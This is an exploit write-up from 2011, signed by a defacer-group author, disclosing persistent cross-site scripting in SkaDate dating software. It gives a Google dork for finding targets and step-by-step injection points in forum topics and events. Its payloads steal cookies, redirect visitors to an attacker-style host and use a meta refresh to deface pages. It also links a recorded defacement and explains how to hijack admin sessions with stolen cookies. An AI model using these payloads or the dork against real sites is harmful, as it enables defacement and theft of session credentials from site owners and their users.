Skadate Cross Site Scripting

`# Exploit Title: [Skadate Persistent Cross Site Scripting Vulnerability]  
# Google Dork: [Powered by SkaDate dating]  
# Date: [2 January 2011]   
# Author: Akastep  
# Software Link: http://www.skadate.com   
# Version: SkaDate dating software  
# Tested on: nginx/0.7.62 (php version: PHP/5.2.14)  
  
  
----- [ Exploit: Persistent Cross Site Scripting Vulnerability in Skadate] --------  
  
  
Login to Skadate system:  
Go to forum section and open new topic:  
In header of topic just inject your code:  
For ex: <script>alert(document.cookie);</script>  
Or for deface that forum section:  
For ex:  
<script>location.replace("http://upw_ned.com/");</script>  
  
Or Just use HTML Meta redirect:  
  
<meta http-equiv="refresh" content="0;url=http://upw_ned.com/u4pwned/">  
  
And Post the topic.  
  
  
Demo:  
http://www.skadate.com/demo/forum/forum.php?forum_id=9  
Or:  
http://www.skadate.com/demo/forum/topic.php?topic_id=133  
  
Defacement of skadate forum section:  
http://mirror-az.com/mirror/?id=8338  
  
  
  
Second Vuln again Persistent XSS:  
  
Go to events and Create New Event  
And inject in header of will created event javascript sceanrio:  
<script>alert(document.cookie);</script>  
  
Demo:  
http://www.skadate.com/demo/member/event.php?eventId=78  
  
Also this vuln will affect anyone of who views your profile.  
  
  
Attacker who can expoit this vulnerability can deface site (using javascript or html meta redirect way)  
Or he/she can grab admin credentials (cookie session) and then using Minibrowser login to system as admin with stealed cookies.  
  
  
/Akastep  
  
wWw.Azhack.Com   
WwW.Pirates-CrEW.org  
wWw.AzDeFaCers.Org  
  
  
#############################################################################################  
Allahu Akbar!  
  
#############################################################################################  
  
  
  
  
`